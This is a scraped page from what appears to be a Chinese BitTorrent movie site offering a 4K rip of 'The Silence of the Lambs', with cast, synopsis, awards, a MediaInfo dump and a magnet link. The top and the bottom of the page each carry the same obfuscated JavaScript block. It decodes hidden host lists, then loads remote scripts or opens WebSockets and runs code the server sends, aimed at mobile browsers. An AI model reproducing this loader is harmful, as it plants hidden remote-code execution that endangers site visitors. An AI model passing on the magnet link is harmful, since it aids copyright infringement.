沉默的羔羊[中文字幕].The.Silence.of.the.Lambs.1991.2160p.HDR.UHD.BluRay.DTS.x265-10bit 13.86GB

B4dmin7 1月前 246

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 沉默的羔羊

◎片 名 The Silence of the Lambs

◎年 代 1991

◎产 地 美国

◎类 别 剧情 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 1991-02-14(美国)

◎IMDb链接 https://www.imdb.com/title/tt0102926/

◎豆瓣评分 8.9/10 (739503人评价)

◎豆瓣链接 https://movie.douban.com/subject/1293544/

◎片 长 118分钟

◎导 演 乔纳森·戴米 Jonathan Demme (id:1032064)

◎编 剧 托马斯·哈里斯 Thomas Harris (id:1286121)

泰德·塔里 Ted Tally (id:1000753)

◎演 员 朱迪·福斯特 Jodie Foster (id:1031222)

安东尼·霍普金斯 Anthony Hopkins (id:1054434)

斯科特·格伦 Scott Glenn (id:1007019)

安东尼·希尔德 Anthony Heald (id:1049857)

布鲁克·史密斯 Brooke Smith (id:1018020)

卡斯·莱蒙斯 Kasi Lemmons (id:1032369)

弗兰基·费森 Frankie Faison (id:1019102)

泰德·拉文 Ted Levine (id:1017934)

崔西·沃特 Tracey Walter (id:1164847)

丹·巴特勒 Dan Butler (id:1036687)

达拉 Darla (id:1372817)

查尔斯·纳佩尔 Charles Napier (id:1002794)

奥巴·巴巴图德 Obba Babatundé (id:1058076)

黛安·贝克 Diane Baker (id:1032184)

户田惠子 Keiko Toda (id:1051741)

罗杰·科曼 Roger Corman (id:1002780)

丹尼尔·冯·巴根 Daniel von Bargen (id:1165516)

克里斯·艾塞克 Chris Isaak (id:1009490)

丹尼·达斯特 Danny Darst (id:1281826)

乔治·A·罗梅罗 George A. Romero (id:1007001)

查克·阿贝 Chuck Aber (id:1446389)

罗纳德·M·博兹曼 Ronald M. Bozman (id:1279124)

爱德华·萨克森 Edward Saxon (id:1296791)

霍华德·肖 Howard Shore (id:1027953)

塔克·藤本 Tak Fujimoto (id:1009829)

克雷格·麦凯 Craig McKay (id:1291636)

凯伦·奥哈拉 Karen O'Hara (id:1293413)

柯琳·阿特伍德 Colleen Atwood (id:1277560)

Allen Weisinger Allen Weisinger (id:1300632)

艾兰·丹格里奥 Alan D'Angerio (id:1281682)

卡尔·富勒顿 Carl Fullerton (id:1284349)

Neal Martz Neal Martz (id:1291165)

罗纳德·M·博兹曼 Ronald M. Bozman (id:1279124)

Kyle McCarthy Kyle McCarthy (id:1291459)

克里斯托弗·纽曼 Christopher Newman (id:1129878)

◎标 签 惊悚 / 心理 / 悬疑 / 犯罪 / 经典 / 沉默的羔羊 / 美国 / 恐怖

◎简 介

联调局学院学员 Clarice M. Starling(乔迪·福斯特 饰)受行为科学组的 Jack Crawford(斯科特·格伦 饰)指派,前往州立巴尔的摩法医院访问被监禁的精神科医生 Hannibal Lecter(安东尼·霍普金斯 饰)。Lecter要求转到条件较 好的联邦机构,远离常常折磨他的 Frederick Chilton 医生(安东尼·希尔德 饰),并愿意为此提供持续作案的连环杀手水牛比尔(泰德·莱文 饰)的心理分析……

◎获奖情况 (共11项)

第64届奥斯卡金像奖 (1992)

最佳影片

最佳导演

└──乔纳森·戴米 (id:1032064)

最佳男主角

└──安东尼·霍普金斯 (id:1054434)

最佳女主角

└──朱迪·福斯特 (id:1031222)

最佳改编剧本

└──泰德·塔里 (id:1000753)

最佳剪辑(提名)

└──克雷格·麦凯 (id:1291636)

最佳音响(提名)

第41届柏林国际电影节 (1991)

金熊奖 最佳影片(提名)

└──乔纳森·戴米 (id:1032064)

银熊奖 最佳导演

└──乔纳森·戴米 (id:1032064)

第15届日本电影学院奖 (1992)

最佳外语片(提名)

第16届报知映画赏 (1991)

海外作品奖

└──乔纳森·戴米 (id:1032064)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 3237823982098854567331277411226768481 (0x26F950C1E9369F105DAA7289C845461)

  4. Complete name : The.Sile[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 13.9 GiB

  8. Duration : 1 h 58 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 16.7 Mb/s

  11. Movie name : The Silence of the Lambs 1991 2160p HDR UHD BluRay DTS [email protected]

  12. Encoded date : UTC 2021-10-25 13:31:39

  13. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. HDR format : SMPTE ST 2086, HDR10 compatible

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 58 min

  23. Bit rate : 14.7 Mb/s

  24. Width : 3 840 pixels

  25. Height : 2 072 pixels

  26. Display aspect ratio : 1.85:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.077

  33. Stream size : 12.2 GiB (88%)

  34. Title : @HDSky

  35. Writing library : x265 - H.265/HEVC codec

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.2020

  40. Transfer characteristics : PQ

  41. Matrix coefficients : BT.2020 non-constant

  42. Mastering display color primaries : Display P3

  43. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level : 739 cd/m2

  45. Maximum Frame-Average Light Level : 331 cd/m2


  46. Audio

  47. ID : 2

  48. Format : DTS XLL

  49. Format/Info : Digital Theater Systems

  50. Commercial name : DTS-HD Master Audio

  51. Codec ID : A_DTS

  52. Duration : 1 h 58 min

  53. Bit rate mode : Variable

  54. Bit rate : 2 035 kb/s

  55. Channel(s) : 6 channels

  56. Channel layout : C L R Ls Rs LFE

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 93.750 FPS (512 SPF)

  59. Bit depth : 24 bits

  60. Compression mode : Lossless

  61. Stream size : 1.69 GiB (12%)

  62. Title : English

  63. Language : English

  64. Default : Yes

  65. Forced : No


  66. Text #1

  67. ID : 3

  68. Format : PGS

  69. Muxing mode : zlib

  70. Codec ID : S_HDMV/PGS

  71. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  72. Duration : 1 h 52 min

  73. Bit rate : 20.4 kb/s

  74. Count of elements : 2459

  75. Stream size : 16.4 MiB (0%)

  76. Title : CHS

  77. Language : Chinese

  78. Default : Yes

  79. Forced : No


  80. Text #2

  81. ID : 4

  82. Format : PGS

  83. Muxing mode : zlib

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 52 min

  87. Bit rate : 20.9 kb/s

  88. Count of elements : 2459

  89. Stream size : 16.8 MiB (0%)

  90. Title : CHT

  91. Language : Chinese

  92. Default : No

  93. Forced : No


  94. Menu

  95. 00:00:00.000 : en:Chapter 01

  96. 00:09:29.152 : en:Chapter 02

  97. 00:19:35.633 : en:Chapter 03

  98. 00:26:59.076 : en:Chapter 04

  99. 00:34:59.973 : en:Chapter 05

  100. 00:41:14.681 : en:Chapter 06

  101. 00:48:46.757 : en:Chapter 07

  102. 00:57:45.420 : en:Chapter 08

  103. 01:04:49.427 : en:Chapter 09

  104. 01:13:46.922 : en:Chapter 10

  105. 01:21:11.658 : en:Chapter 11

  106. 01:27:16.106 : en:Chapter 12

  107. 01:33:16.758 : en:Chapter 13

  108. 01:39:57.200 : en:Chapter 14

  109. 01:50:03.388 : en:Chapter 15

  110. 01:53:42.816 : en:Chapter 16




复制代码


TAGS 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:B4F5B82FB79C91D64B789CBD897CEA57B82C2619

上传的附件:
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};